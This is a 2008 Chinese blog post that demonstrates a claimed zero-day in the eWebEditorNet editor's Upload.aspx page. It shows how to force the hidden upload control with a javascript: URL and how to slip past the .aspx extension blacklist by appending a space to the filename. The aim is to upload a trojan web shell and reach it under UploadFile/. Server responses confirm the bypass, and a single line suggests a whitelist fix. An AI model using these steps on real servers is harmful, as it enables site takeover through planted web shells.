1. 公告

    • 黑夜给了我黑色的眼睛去寻找光明,阳光给了我明亮的眼睛我却是去寻找黑暗,所以我只有在夜里才出现真实的自己。(菩提本不树,明镜亦非台,本来无一物,何处染尘埃。)
  2. 写作时间

    << 2008-11 >>

    Sun

    Mon

    Tue

    Wed

    Thu

    Fri

    Sat

    1

    2

    3

    4

    5

    6

    7

    8

    9

    10

    11

    12

    13

    14

    15

    16

    17

    18

    19

    20

    21

    22

    23

    24

    25

    26

    27

    28

    29

  3. 原创下载

  4. 最新文章

  5. 最新评论

  6. 文章归档

  7. Statistics

    • 文章总数:172
    • 评论总数:60
    • 引用总数:0
    • 浏览总数:221449
    • 留言总数:0
    • 当前样式:4u-HK
    • 当前语言:zh-CN
  8. 友情链接

  9. 反向链接

eWebEditorNet 漏洞演示[0Day]

{
转载请保留版权信息
PopSky 'S Blog
http://www.popsky.org/
}

当访问eWebEditorNet/Upload.aspx时,可以看到只有浏览,缺少了上传按钮....

不过没关系,在选择好我们要上传的木马以后,直接再在IE当中输入javascript:lbtnUpload.click();回车

上传完毕了,看看返回的原代码...[鼠标右键点查看源文件]

<a id="lbtnUpload" href="javascript:__doPostBack('lbtnUpload','')"></a><script language='javascript'>parent.UploadError('不允许上传此类型的文件!!');</script>

看来上传失败了...做了过滤,限制ASPX的文件上传了.....

继续回到前面,我们在地址后面打一个空格试试

<a id="lbtnUpload" href="javascript:__doPostBack('lbtnUpload','')"></a><script language='javascript'>parent.UploadSavedFinish('20081232115126366.aspx ','jackie.aspx ');history.back();</script>

嘿嘿....绕过了限制......成功的上传了ASPX文件....

文件默认的上传后保存的地址是eWebEditorNet/UploadFile/现在来看看是否上传成功.....

接下来,别再问我还能做什么了,我也不知道.....

总结:

1>
javascript:lbtnUpload.click(); 主语言为javascrypt,向当前页面的lbtnUpload发送一个单击事件...实际上也就相当于我们点了提交按钮,一样的....

2>
脚本里面限制了ASPX为后缀的文件不允许上传,再地址栏后加了一个空格(实际上加别的符号也行,例如 ' ),脚本获取到的文件名就为'aspx ',所以if xxx ='aspx' then 这类型的判断语句就不好使了....修复方法为把不允许改为只允许........

您或许还对以下的内容感兴趣:

如果您拥有一个BLOG,如果您的BLOG的PV/IP/PR还算不错,如果您打算用您所拥有的BLOG来赚钱,那么我来告诉您几个赚钱的方法:

1、透过 Google AdSense 使您的BLOG产生收益

2、您还可以通过申请TextLinkAds投放者来直接出售链接位从而产生收入。